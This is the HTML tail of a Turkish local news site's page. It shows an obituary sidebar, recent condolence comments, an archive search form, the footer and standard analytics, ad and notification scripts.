Yılan 42 yaşında</strong> <span class="en-spot en-hidden">Oğuz Yılan 42 yaşında</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/ali-katkaya-88-yasinda-h68727.html" title="Ali Katkaya 88 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2020/12/ali_katkaya_88_yasinda_h68727_9f3e7.jpg" alt="Ali Katkaya 88 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ali-katkaya-88-yasinda-h68727.html" title="" ><span class="en-hit">5.</span> <strong>Ali Katkaya 88 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/necati-zencirkiran-h68929.html#comment_336653" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/h-ahmet-has-h68943.html#comment_336652" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismet-yuzbasi-berber-83-yasinda-h68936.html#comment_336651" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismet-yuzbasi-berber-83-yasinda-h68936.html#comment_336650" title="" >mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismet-yuzbasi-berber-83-yasinda-h68936.html#comment_336649" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mahmut-koprubasi-h68937.html#comment_336648" title="" >Allah Rahmet eylesin Mekani cennet olsun,...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismet-yuzbasi-berber-83-yasinda-h68936.html#comment_336647" title="" >Allah rahmet eylesin</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-mahmut-koprubasi-h68937.html#comment_336646" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/hamdi-batmaz-setrekli-93-yasinda-h68931.html#comment_336645" title="" >MERHUM HAMDİ AMCAYA ALLAH TAN RAHMET YAKINLARINA...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismet-yuzbasi-berber-83-yasinda-h68936.html#comment_336644" title="" >Yüceler yücesi Allah cc Gani Gani rahmet...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/h-ahmet-has-h68943.html#comment_336643" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-celal-kecebir-h68944.html#comment_336642" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/anma-sevim-gokcek-h68945.html#comment_336641" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/h-ahmet-has-h68943.html#comment_336640" title="" >Allah rahmet eylesin Ailesin başı sağ...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/h-ahmet-has-h68943.html#comment_336639" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismet-yuzbasi-berber-83-yasinda-h68936.html#comment_336638" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ismet-yuzbasi-berber-83-yasinda-h68936.html#comment_336637" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/h-ahmet-has-h68943.html#comment_336636" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/h-ahmet-has-h68943.html#comment_336635" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN.</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/necati-zencirkiran-h68929.html#comment_336633" title="" >Mekânı cennet olsun nur içinde yatsın</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" selected>11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" selected>Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" >Ekim</option> <option value="11" >Kasım</option> <option value="12" >Aralık</option> </select> <select name="yil" class="year span1"> <option value="2021" selected>2021</option> <option value="2020" >2020</option> <option value="2019" >2019</option> <option value="2018" >2018</option> <option value="2017" >2017</option> </select> <button type="submit" class="btn btn-default pull-right">Ara</button> </form> </div> </div> </div> </div> <!-- Sol Dikey Reklam --> <div class="reklam dikey sol" style="width:px;height:px;"> </div> <!-- Sağ Dikey Reklam --> <div class="reklam dikey sag ortala" style="width:px;height:px;"> <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script> <!-- kaynarca --> <ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-3633419220222736" data-ad-slot="5807534991" data-ad-format="auto" data-full-width-responsive="true"></ins> <script> (adsbygoogle = window.adsbygoogle || []).push({}); </script></p> </div> </div> <!-- FOOTER --> <div id="siteFooter" class="footer"> <div class="row-fluid"> <div class="container center"> <div class="span4"> <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div> <div class="footer-social"> <a href="https://facebook.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a> <a href="https://twitter.com/elbistaninsesi" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a> <a href="https://www.instagram.com/elbistaninsesi_/" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/ins-ico.png" width="32" height="32" /> <img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/google_circle-32.png" alt="GOOGLE PLUS"></a> <a href="http://www.elbistaninsesi.com/rss"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a> </div> </div> <div class="span4 text-center"> <div class="footer-logo"><a href="http://www.elbistaninsesi.com/" class="logo"><img src="http://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="298 adet ecstasy hapla yakalanan zehir tacirleri tutuklandı" /></a></div> </div> <div class="span4"> <p><center> 0 (344) 415 04 15 <br> <a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="23464f414a5057424d4a4d5046504a444259465746504a63444e424a4f0d404c4e">[email&#160;protected]</a> <br>Kızılcaoba Mah. Kışla Cad. 19/1</center> </p> <p class="site-info glyphicons earphone">0 (344) 415 04 15</p> </div> </div> </div> <div id="footer-alt" class="row-fluid"> <div class="container center"> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="http://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div> </div> <div class="span3"> <div class="footer-alt-link"><a href="#" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div> </div> </div> </div> <div class="row-fluid"> <div class="container center"> <div class="span12 text-center"> <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p> <p><a href="http://www.haber-sistemi.com" title="Haber Scripti">Haber Scripti</a> | <a href="http://www.tebilisim.com" title="TE Bilişim" target="_blank">TE Bilişim<br> </div> </div> </div> <div id="top" class="btn btn-inverse">Yukarı Çık</div> </div> <div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Üye Girişi</h3> </div> <div class="modal-body"> <form class="form-horizontal" action="http://www.elbistaninsesi.com/index.php?m=login&rd=http%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2F298-adet-ecstasy-hapla-yakalanan-zehir-tacirleri-tutuklandi-h68941.html" method="post"> <div class="control-group"> <label class="control-label" for="inputName">Kullanıcı Adı</label> <div class="controls"> <input id="inputName" value="" name="kullanici" type="text" placeholder="Kullanıcı Adı" required> </div> </div> <div class="control-group"> <label class="control-label" for="inputPassword">Şifre</label> <div class="controls"> <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required> </div> </div> <div class="control-group"> <div class="controls"> <button type="submit" class="btn btn-info">Giriş Yap</button> </div> </div> </form> </div> <div class="modal-footer"> <a href="http://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a> <a href="http://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a> <button class="btn btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button> </div> </div> <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/getshares.min.js"></script><script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.elevateZoom-3.0.8.min.js"></script> <script src="http://www.elbistaninsesi.com/_themes/hs-rush-php/js/system-min.js"></script> <script type="text/javascript">	new UISearch( document.getElementById( 'sb-search' ) );	$(function(){	});	$("#comment_list .text").pKisalt();	var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML;	var gsSpace = ' ';	var gsUrl = location.href;	new GetShare({ root: $(".gs-facebook"), network: "facebook", share: { }	});	new GetShare({ root: $(".gs-twitter"), network: "twitter", share: { message:gsTitle+gsSpace+gsUrl }	});	new GetShare({ root: $(".gs-google"), network: "googleplus", share: { }	});	new GetShare({ root: $(".gs-linkedin"), network: "linkedin", share: { }	});	jQuery('#anasayfayazar').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[4,4,4,4],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"off",	delay:4000,	speed:750	});	jQuery('#gununmansetleri').showbizpro({	allEntryAtOnce:"on",	dragAndScroll:"off",	visibleElementsArray:[6,6,6,6],	carousel:"off",	heightOffsetBottom:0,	rewindFromEnd:"off",	autoPlay:"on",	delay:4000,	speed:750	});	$('#haber > .page-header').waypoint(function(direction) { $('#article-finished').toggleClass('hiding', direction === "up");	}, { offset: function() { return $.waypoints('viewportHeight') - $(this).height() - 750; }	});	function addLink() { var kisa_site_adi = "Elbistanın Sesi"; var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com"; var body_element = document.getElementsByTagName('body')[0]; var selection; selection = window.getSelection(); var pagelink = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi; var copytext = selection + pagelink; var newdiv = document.createElement('div'); newdiv.style.position='absolute'; newdiv.style.left='-99999px'; body_element.appendChild(newdiv); newdiv.innerHTML = copytext; selection.selectAllChildren(newdiv); window.setTimeout(function() { body_element.removeChild(newdiv); },0);	}	document.oncopy = addLink;	tebilisim('68941', 'haber', ''); </script> <!-- Google Analytics --> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', analitik_ga, 'auto'); ga('send', 'pageview'); </script> <!-- End Google Analytics --> <script src="https://cdn.onesignal.com/sdks/OneSignalSDK.js" async='async'></script> <script> var OneSignal = window.OneSignal || [];	OneSignal.push(["init", {	appId: "51fe1034-635b-4e70-859b-1fc8dff5f28d",	autoRegister: true,	subdomainName: 'elbistaninsesi',	setDefaultNotificationUrl: 'http://www.elbistaninsesi.com/',	notifyButton: { enable: false	},	/*	welcomeNotification: { "title": "Hoş geldiniz", "message": "Bildirimlerimize üye olduğunuz teşekkür ederiz.",	},	*/ promptOptions: { actionMessage: "Sondakika haberlerimizi anında öğrenebilmek için bildirimleri kabul edin!", acceptButtonText: "ABONE OL", cancelButtonText: "İSTEMİYORUM", autoAcceptTitle: '"İzin ver" butonuna tıklayın', exampleNotificationCaption: '(istediğin zaman aboneliğini iptal edebilirsin)', } }]); </script> </body> </html> 